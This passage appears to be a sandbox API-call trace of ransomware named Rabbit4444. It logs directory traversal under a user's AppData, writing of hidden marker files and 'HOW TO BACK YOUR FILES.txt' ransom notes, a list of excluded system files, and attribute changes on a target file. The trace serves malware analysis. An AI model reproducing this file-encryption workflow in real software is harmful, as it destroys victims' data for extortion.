(lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\cm\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.910] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.911] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.911] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.911] CloseHandle (hObject=0x278) returned 1 [0052.911] CloseHandle (hObject=0x27c) returned 1 [0052.911] GetCurrentThreadId () returned 0xd98 [0052.911] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6430 [0052.911] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project" [0052.911] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0052.911] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6428 | out: hHeap=0xe0000) returned 1 [0052.911] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project" [0052.911] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\" [0052.911] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\.BFC0E91B00AE8A0620D3" [0052.911] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.912] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.914] FlushFileBuffers (hFile=0x27c) returned 1 [0052.915] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.915] CloseHandle (hObject=0x27c) returned 1 [0052.916] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project") returned 52 [0052.916] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.916] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xe8dca8c3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0052.916] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.916] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.916] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.916] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.916] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xe8dca8c3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.916] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.916] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.916] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.916] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.916] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.916] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8dca8c3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8dca8c3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8dca8c3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.916] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.916] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.916] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 1 [0052.917] lstrcmpiW (lpString1="16", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.917] lstrcmpiW (lpString1="16", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.917] lstrcmpiW (lpString1="16", lpString2="Rabbit4444.exe") returned -1 [0052.917] lstrcmpiW (lpString1="16", lpString2=".") returned 1 [0052.917] lstrcmpiW (lpString1="16", lpString2="..") returned 1 [0052.917] lstrcmpiW (lpString1="16", lpString2="windows") returned -1 [0052.917] lstrcmpiW (lpString1="16", lpString2="bootmgr") returned -1 [0052.917] lstrcmpiW (lpString1="16", lpString2="pagefile.sys") returned -1 [0052.917] lstrcmpiW (lpString1="16", lpString2="boot") returned -1 [0052.917] lstrcmpiW (lpString1="16", lpString2="ids.txt") returned -1 [0052.917] lstrcmpiW (lpString1="16", lpString2="NTUSER.DAT") returned -1 [0052.917] lstrcpyW (in: lpString1=0x130eba2, lpString2="16" | out: lpString1="16") returned="16" [0052.917] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6428 [0052.917] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x70) returned 0x117ba8 [0052.917] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6430 | out: ListHead=0xf68b0, ListEntry=0xf6430) returned 0xf6410 [0052.917] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0052.917] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0052.917] lstrcpyW (in: lpString1=0x130eba2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.917] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.919] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.919] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.919] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.919] CloseHandle (hObject=0x278) returned 1 [0052.919] CloseHandle (hObject=0x27c) returned 1 [0052.920] GetCurrentThreadId () returned 0xd98 [0052.920] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6430 [0052.920] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16" [0052.920] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0052.920] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6428 | out: hHeap=0xe0000) returned 1 [0052.920] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16" [0052.920] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\" [0052.920] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\.BFC0E91B00AE8A0620D3" [0052.920] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.922] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.924] FlushFileBuffers (hFile=0x27c) returned 1 [0052.925] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.925] CloseHandle (hObject=0x27c) returned 1 [0052.926] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16") returned 55 [0052.926] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.926] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xe8dca8c3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0052.926] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.926] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.926] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.926] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.926] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xe8dca8c3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.926] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.926] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.926] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.926] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.926] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.926] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8dca8c3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8dca8c3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8df0b18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.926] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.926] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.926] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0052.926] lstrcmpiW (lpString1="en-US", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.926] lstrcmpiW (lpString1="en-US", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.926] lstrcmpiW (lpString1="en-US", lpString2="Rabbit4444.exe") returned -1 [0052.926] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0052.926] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0052.926] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0052.926] lstrcmpiW (lpString1="en-US", lpString2="bootmgr") returned 1 [0052.926] lstrcmpiW (lpString1="en-US", lpString2="pagefile.sys") returned -1 [0052.926] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0052.927] lstrcmpiW (lpString1="en-US", lpString2="ids.txt") returned -1 [0052.927] lstrcmpiW (lpString1="en-US", lpString2="NTUSER.DAT") returned -1 [0052.927] lstrcpyW (in: lpString1=0x130eba8, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0052.927] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6428 [0052.927] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7c) returned 0x101af0 [0052.927] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6430 | out: ListHead=0xf68b0, ListEntry=0xf6430) returned 0xf6410 [0052.927] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0052.927] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0052.927] lstrcpyW (in: lpString1=0x130eba8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.927] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.927] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.927] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.928] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.928] CloseHandle (hObject=0x278) returned 1 [0052.928] CloseHandle (hObject=0x27c) returned 1 [0052.928] GetCurrentThreadId () returned 0xd98 [0052.928] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6430 [0052.928] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US" [0052.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0052.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6428 | out: hHeap=0xe0000) returned 1 [0052.928] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US" [0052.928] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\" [0052.928] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\.BFC0E91B00AE8A0620D3" [0052.928] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.944] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.947] FlushFileBuffers (hFile=0x27c) returned 1 [0052.947] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.948] CloseHandle (hObject=0x27c) returned 1 [0052.948] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US") returned 61 [0052.948] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.948] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xe8df0b18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0052.948] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.948] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.948] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.948] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.948] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xe8df0b18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.948] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.948] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.949] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.949] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.949] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.949] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8df0b18, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8df0b18, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8e16df0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.949] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.949] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.949] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee780bf0, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x12fe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Global.MPT", cAlternateFileName="")) returned 1 [0052.949] lstrcmpiW (lpString1="Global.MPT", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.949] lstrcmpiW (lpString1="Global.MPT", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.949] lstrcmpiW (lpString1="Global.MPT", lpString2="Rabbit4444.exe") returned -1 [0052.949] lstrcmpiW (lpString1="Global.MPT", lpString2=".") returned 1 [0052.949] lstrcmpiW (lpString1="Global.MPT", lpString2="..") returned 1 [0052.949] lstrcmpiW (lpString1="Global.MPT", lpString2="windows") returned -1 [0052.949] lstrcmpiW (lpString1="Global.MPT", lpString2="bootmgr") returned 1 [0052.949] lstrcmpiW (lpString1="Global.MPT", lpString2="pagefile.sys") returned -1 [0052.949] lstrcmpiW (lpString1="Global.MPT", lpString2="boot") returned 1 [0052.949] lstrcmpiW (lpString1="Global.MPT", lpString2="ids.txt") returned -1 [0052.949] lstrcmpiW (lpString1="Global.MPT", lpString2="NTUSER.DAT") returned -1 [0052.949] lstrcpyW (in: lpString1=0x130ebb4, lpString2="Global.MPT" | out: lpString1="Global.MPT") returned="Global.MPT" [0052.949] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT", dwFileAttributes=0x0) returned 1 [0052.949] lstrlenW (lpString="Global.MPT") returned 10 [0052.949] lstrlenW (lpString="Rabbit4444") returned 